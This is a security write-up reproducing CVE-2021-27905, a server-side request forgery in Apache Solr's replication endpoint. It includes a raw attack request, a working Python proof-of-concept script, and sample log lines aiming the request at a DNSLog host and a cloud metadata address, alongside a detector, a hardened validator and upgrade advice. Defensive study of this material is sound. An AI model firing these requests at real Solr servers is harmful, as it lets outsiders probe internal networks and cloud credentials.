Apache Solr SSRF (CVE-2021-27905) Reproduction


0x00 Vulnerability Overview

Apache Solr is an open-source search service written in Java. It is a standalone full-text search server that runs in a Servlet container and is the open-source enterprise search platform of the Apache Lucene project.

CVE-2021-27905 is a server-side request forgery (SSRF) in Solr's ReplicationHandler, which is registered under every core at /replication. Its fetchindex command takes a masterUrl parameter (alias: leaderUrl) naming the remote core to pull an index from. The handler issues an HTTP request to whatever URL is supplied without validating it, so anyone who can reach a core can make the Solr server send requests on their behalf, to a DNSLog host as in the reproduction below, or to internal services the attacker cannot reach directly.

 

0x01 Affected Versions

Apache Solr < 8.8.2 (all releases up to and including 8.8.1; the fix shipped in 8.8.2)

 

0x02 Reproduction

1. This reproduction uses Apache Solr 8.8.1. Download and extract it, enter the bin directory, and start it with:

solr start -p 8983   // start the environment (8983 is Solr's default port; on Windows the script is solr.cmd)

(Download link: http://archive.apache.org/dist/lucene/solr/8.8.1/)

2. In the admin UI, click Core Admin and try to add a core. The creation fails with an error, because the new core directory contains no configuration yet.

At this point Solr has already created a folder named new_core under server/solr. Copy the conf folder from server/solr/configsets/_default into the newly created new_core folder (the configset that ships with Solr is named _default, with a leading underscore):

The core can now be created successfully. (The same result in one step, without the UI: bin/solr create -c new_core.)

Visit http://127.0.0.1:8983/solr/admin/cores?indexInfo=false&wt=json to see the core name:

 

3. SSRF request (where {core} is the name of a core on the target node and {dnslog} is your DNSLog domain; the leaderUrl alias of masterUrl is handled the same way):

GET /solr/{core}/replication?command=fetchindex&masterUrl={dnslog} HTTP/1.1
Host: IP
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36
Referer: http://IP/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

 

4. POC (the script first asks the Core Admin API for a core name, then sends the fetchindex request with masterUrl pointing at the DNSLog host):

 

# CVE-2021-27905
# Apache Solr SSRF

import requests
import urllib3
import json
import sys, getopt
urllib3.disable_warnings()

HEADERS = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
}


def title():
    print("[-------------------------------------------------------------]")
    print("[--------------        Apache Solr SSRF        ---------------]")
    print("[--------               CVE-2021-27905               ----------]")
    print("[--------use:python3 CVE-2021-27905.py -u url -d dnslog--------]")
    print("[--------              Author:Henry4E36            ------------]")
    print("[-------------------------------------------------------------]")


def commit():
    """Parse -u/--url and -d/--dnslog; both are required."""
    url = ""
    dnslog = ""
    usage = "[-] Invalid arguments! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1:8983 -d dnslog"
    try:
        # getopt reports long options as "--url" / "--dnslog" (without the "=")
        opts, args = getopt.getopt(sys.argv[1:], "hu:d:", ["help", "url=", "dnslog="])
        for op, value in opts:
            if op in ("-h", "--help"):
                print("""
            [-]   Apache Solr SSRF (CVE-2021-27905)
            [-]   Options:
                     -h or --help      :   show this help
                     -u or --url       :   target site URL
                     -d or --dnslog    :   DNSLog domain
                """)
                sys.exit(0)
            elif op in ("-u", "--url"):
                url = value.rstrip("/")
            elif op in ("-d", "--dnslog"):
                dnslog = value
    except getopt.GetoptError:
        print(usage)
        sys.exit(1)
    if not url or not dnslog:
        print(usage)
        sys.exit(1)
    return url, dnslog


def target_core(url):
    """Ask the Core Admin API for the core list and return the first core name (None on failure)."""
    target_url = url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        res = requests.get(url=target_url, headers=HEADERS, verify=False, timeout=5)
        core = list(json.loads(res.text)["status"])[0]
        return core
    except Exception as e:
        print(f"[!]  Target {url}: unexpected error while listing cores!\n ", e)
        return None


def ssrf(url, core, dnslog):
    """Send the fetchindex request with masterUrl pointing at the DNSLog host."""
    target_url = url + f"/solr/{core}/replication/?command=fetchindex&masterUrl=http://{dnslog}"
    try:
        res = requests.get(url=target_url, headers=HEADERS, verify=False, timeout=5)
        status = json.loads(res.text).get("status")
        # ReplicationHandler answers "OK" as soon as it accepts the fetch; the request to
        # masterUrl is made afterwards, so the DNSLog record is the real confirmation.
        if res.status_code == 200 and status == "OK":
            print(f"[!]  \033[31mTarget {url} may be vulnerable to SSRF; check the DNSLog for a lookup of {dnslog}!\033[0m")
        else:
            print(f"[0]  Target {url} does not appear vulnerable to SSRF")
    except Exception as e:
        print(f"[!]  Target {url}: unexpected error while sending fetchindex!\n ", e)


if __name__ == "__main__":
    title()
    url, dnslog = commit()
    core = target_core(url)
    if core is None:
        print(f"[-]  Target {url}: no core found, cannot continue")
        sys.exit(1)
    ssrf(url, core, dnslog)
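On the defender's side, the request in step 3 is easy to spot: a fetchindex call whose masterUrl (or leaderUrl) names a host this node has no business replicating from. The following detection example is added here and is not part of the original post or of Solr. It scans NCSA-style request-log lines (the shape Jetty's request log produces) for fetchindex requests whose source host is outside an allowlist of known replication peers. The log lines, the allowlist entry 10.0.0.9:8983, the client addresses and the hostnames are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in NCSA request-log shape (not real traffic): one normal
# query, one legitimate pull from an internal peer, two SSRF attempts (a DNSLog host,
# then a cloud metadata address via the leaderUrl alias), one harmless status call.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Apr/2021:12:00:01 +0000] "GET /solr/new_core/select?q=*:*&wt=json HTTP/1.1" 200 512
10.0.0.7 - - [10/Apr/2021:12:00:02 +0000] "GET /solr/new_core/replication?command=fetchindex&masterUrl=http://10.0.0.9:8983/solr/new_core HTTP/1.1" 200 80
203.0.113.4 - - [10/Apr/2021:12:00:03 +0000] "GET /solr/new_core/replication?command=fetchindex&masterUrl=http%3A%2F%2Fabc123.dnslog.example%2F HTTP/1.1" 200 80
203.0.113.4 - - [10/Apr/2021:12:00:04 +0000] "GET /solr/new_core/replication/?command=fetchindex&leaderUrl=http://169.254.169.254/latest/meta-data/ HTTP/1.1" 200 80
10.0.0.7 - - [10/Apr/2021:12:00:05 +0000] "GET /solr/new_core/replication?command=details&wt=json HTTP/1.1" 200 300
"""

# Assumed allowlist of replication peers (host:port) this node is expected to pull from.
ALLOWED_PEERS = {"10.0.0.9:8983"}

NCSA_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# ReplicationHandler lives at /solr/<core>/replication (a trailing slash is tolerated)
REPLICATION_PATH_RE = re.compile(r"/solr/(?P<core>[^/]+)/replication/?")


def find_suspicious_fetchindex(log_text, allowed_peers=ALLOWED_PEERS):
    """Return one dict per fetchindex request whose source host is not an allowed peer."""
    hits = []
    for line in log_text.splitlines():
        m = NCSA_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        path_match = REPLICATION_PATH_RE.fullmatch(target.path)
        if not path_match:
            continue
        params = parse_qs(target.query)  # parse_qs also percent-decodes the values
        if params.get("command", [""])[0] != "fetchindex":
            continue
        # masterUrl and its leaderUrl alias both name the remote index source
        source = (params.get("masterUrl") or params.get("leaderUrl") or [None])[0]
        if source is None:
            continue
        peer = urlsplit(source).netloc
        if peer not in allowed_peers:
            hits.append({
                "ts": m.group("ts"),
                "client": m.group("client"),
                "core": path_match.group("core"),
                "source": source,
                "peer": peer,
                "status": m.group("status"),
            })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_fetchindex(SAMPLE_LOG):
        print(f"{hit['ts']} client={hit['client']} core={hit['core']} "
              f"fetchindex from {hit['peer']} ({hit['source']})")
```

Note that the HTTP status is 200 on every line: the handler accepts the fetch before it contacts the remote host, so a successful-looking response is not evidence that the request was benign, and the decision has to rest on where masterUrl points.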

 

0x03 Remediation

Upgrade to Apache Solr 8.8.2 or later, which validates the masterUrl/leaderUrl value instead of fetching from it blindly. Until the upgrade is done, do not expose the Solr HTTP port (8983 by default) to untrusted clients: anyone who can reach a core's /replication endpoint can trigger this request.

Download: https://solr.apache.org/downloads.html
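To make the missing check concrete, here is an added example (written for this page, not Solr's own code) that models the two behaviours side by side in Python: the pre-8.8.2 handling, which takes the caller-supplied masterUrl as-is, and a hardened handling that only accepts http/https URLs whose host:port is on an allowlist of replication peers and rejects userinfo, unknown schemes and malformed ports. The allowlist entry 10.0.0.9:8983 and the function names are assumptions for the example.

```python
from urllib.parse import urlsplit

# Assumed allowlist of replication peers (host:port); example value, not a Solr setting.
ALLOWED_PEERS = {"10.0.0.9:8983"}


def vulnerable_source_url(params):
    """Pre-8.8.2 behaviour in miniature: the caller-supplied masterUrl (or its leaderUrl
    alias) becomes the fetch target with no validation. Kept deliberately unfixed so the
    contrast with check_replication_source() is visible."""
    return params.get("masterUrl") or params.get("leaderUrl")


def check_replication_source(url, allowed_peers=ALLOWED_PEERS):
    """Return (True, "host:port") if url may be fetched from, else (False, reason)."""
    if not url:
        return False, "no source URL"
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme not allowed: {parts.scheme or '(none)'}"
    # "http://10.0.0.9:8983@evil.example/" parses with hostname evil.example; refuse userinfo
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL"
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        port = parts.port  # raises ValueError for a non-numeric port
    except ValueError:
        return False, "malformed port"
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    peer = f"{host}:{port}"
    if peer not in allowed_peers:
        return False, f"peer not in allowlist: {peer}"
    return True, peer


def hardened_source_url(params, allowed_peers=ALLOWED_PEERS):
    """Patched-style handling: refuse the fetch instead of contacting an arbitrary host."""
    url = vulnerable_source_url(params)
    ok, detail = check_replication_source(url, allowed_peers)
    if not ok:
        raise ValueError(f"fetchindex refused: {detail}")
    return url


if __name__ == "__main__":
    attack = {"command": "fetchindex", "masterUrl": "http://abc123.dnslog.example/"}
    print("vulnerable handler would fetch:", vulnerable_source_url(attack))
    try:
        hardened_source_url(attack)
    except ValueError as e:
        print("hardened handler:", e)
```

The allowlist is keyed on host:port rather than on the hostname alone so that a request to an allowed host on an unexpected port (for example a management interface on the same machine) is still refused.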

 

